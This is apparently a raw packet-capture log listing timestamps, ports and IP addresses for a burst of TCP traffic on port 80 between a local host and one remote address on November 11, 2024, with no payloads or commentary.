Nov 11, 2024 10:33:04.844535112 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844535112 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844547987 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844551086 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844559908 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844568968 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844573021 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844584942 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844597101 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844597101 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844608068 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844618082 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844621897 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844630957 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844635010 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844640970 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844650984 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844651937 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844662905 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844674110 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844676971 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844685078 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844696045 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844707012 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844712973 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844717026 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844731092 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844738007 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844744921 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844757080 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844759941 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844768047 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844779015 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844780922 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844790936 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844803095 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844803095 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844814062 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844815969 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844825029 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844836950 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844847918 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844854116 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844858885 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844870090 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844878912 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844881058 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844896078 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844907999 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844919920 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844921112 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844930887 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844942093 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844945908 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844953060 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844964981 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844975948 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844979048 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.844986916 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.844997883 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845002890 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845009089 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845015049 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845021963 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845032930 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845046043 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845046997 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845063925 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845071077 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845074892 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845083952 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845088005 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845112085 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845117092 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845134020 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845139980 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845145941 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845156908 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845163107 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845168114 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845180988 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845181942 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845192909 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845204115 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845206022 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845215082 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845226049 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845226049 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845237970 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845247030 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845248938 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845266104 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845273018 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845279932 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845290899 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845295906 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845303059 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845313072 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845320940 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845324993 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845336914 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845347881 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845352888 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845360041 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845371008 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845372915 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845381975 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845381975 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845395088 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845406055 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845412016 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845421076 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845432043 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845442057 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845442057 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845454931 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845464945 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845467091 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845473051 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845479012 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845491886 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845503092 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845513105 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845514059 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845525980 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845532894 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845535040 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845546961 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845551014 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845566034 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845575094 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845582962 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845594883 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845602036 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845603943 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845618010 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845618963 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845629930 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845640898 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845644951 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845652103 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845670938 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845670938 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845685005 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845690012 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845699072 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845704079 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845710993 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845721006 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845732927 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845741987 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845743895 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845756054 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845767021 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845779896 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845782042 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845792055 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845794916 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845803976 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845809937 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845814943 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845815897 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845827103 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845839024 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845844030 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845849991 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845860004 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845861912 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845873117 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845885992 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845886946 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845900059 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845911026 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845912933 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845922947 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.845927954 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.845957041 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847179890 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847218037 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847367048 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847378016 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847388983 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847399950 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847403049 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847410917 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847415924 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847421885 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847440004 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847444057 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847450018 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847460985 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847461939 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847477913 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847489119 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847490072 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847501040 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847513914 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847515106 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847524881 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847524881 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847538948 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847549915 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847557068 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847560883 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847573996 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847585917 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847585917 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847593069 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847596884 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847610950 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847620010 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847623110 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847635031 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847645044 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847652912 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847661972 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847665071 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847676039 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847687006 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847688913 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847698927 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847709894 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847713947 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847721100 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847732067 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847738981 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847743988 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847753048 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847755909 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847767115 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847768068 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847779036 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847795963 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847803116 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847811937 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847822905 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847830057 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847836018 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847846985 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847847939 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847858906 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847870111 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847881079 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847883940 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847894907 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847894907 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847906113 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847917080 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847918987 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847929001 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847939968 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847944021 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847950935 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847961903 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847965956 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847970009 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.847985029 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.847995043 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.848001003 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.848006964 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.848017931 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.848026037 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.848032951 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.848045111 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.848047018 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.848067045 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.848081112 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849127054 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849138021 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849149942 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849163055 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849164963 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849174023 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849194050 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849236012 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849247932 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849257946 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849271059 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849277020 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849282980 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849286079 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849292994 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849312067 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849313021 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849323988 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849335909 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849335909 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849348068 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849359035 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849359035 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849366903 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849381924 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849385977 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849406958 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849414110 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849425077 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849431038 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849435091 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849447012 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849457026 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849458933 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849472046 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849481106 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849494934 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849519014 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849556923 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849567890 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849577904 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849590063 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849594116 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849601984 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849612951 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849616051 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849625111 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849636078 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849639893 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849647045 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849658966 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849663019 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849669933 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849680901 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849683046 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.849694014 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.849720955 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.851003885 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851022959 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851035118 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851058960 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.851084948 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.851160049 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851170063 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851181030 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851192951 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851197004 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.851205111 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851216078 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851223946 CET	49704	80	192.168.2.5	185.215.113.206
Nov 11, 2024 10:33:04.851227999 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851239920 CET	80	49704	185.215.113.206	192.168.2.5
Nov 11, 2024 10:33:04.851248980 CET	49704	80	192.168.2.5	185.215.113.206
